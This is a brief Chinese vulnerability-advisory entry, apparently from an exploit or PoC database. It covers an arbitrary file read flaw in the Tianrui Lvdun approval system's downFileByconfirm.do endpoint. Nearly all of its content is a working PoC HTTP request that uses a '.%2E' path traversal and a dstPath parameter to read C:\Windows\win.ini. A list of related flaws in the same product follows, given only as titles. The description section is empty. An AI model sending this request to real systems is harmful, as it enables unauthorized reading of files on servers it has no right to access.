天锐绿盾审批系统 downFileByconfirm.do 任意文件读取漏洞

漏洞描述

PoC代码

GET /trwfe/service/.%2E/file/downFileByconfirm.do?dstPath=C:\Windows\win.ini&fileName=&processInstanceIds= HTTP/1.1
Host: 

相关漏洞推荐

• 天锐绿盾审批系统 tdSysFindDepartmentTree.do 信息泄露漏洞
• 天锐绿盾审批系统 findOnlineUserForPage.do 信息泄露漏洞
• 天锐绿盾审批系统 fileServer 信息泄露漏洞
• 天锐绿盾审批系统 findAllDept.do 信息泄露漏洞
• 天锐绿盾审批系统 findDeptPage.do 信息泄露漏洞
• 天锐绿盾审批系统 /ws/taskCommon/endCallback 代码执行漏洞
• 天锐绿盾审批系统 /trwfe/login.jsp/.%2e/rest/ext/mail/update/1 命令执行漏洞
• 天锐绿盾审批系统 findAuditors.do 信息泄露漏洞
• 天锐绿盾审批系统 findAllUser.do 信息泄露漏洞
• 天锐绿盾审批系统 getConfigValues.do 信息泄露漏洞
• 天锐绿盾审批系统 endCallback fastjson 反序列化漏洞
• 天锐绿盾审批系统 findTrusteeByFilter fastjson 反序列化漏洞
• 天锐绿盾审批系统 findTrusteeBydeptId fastjson 反序列化漏洞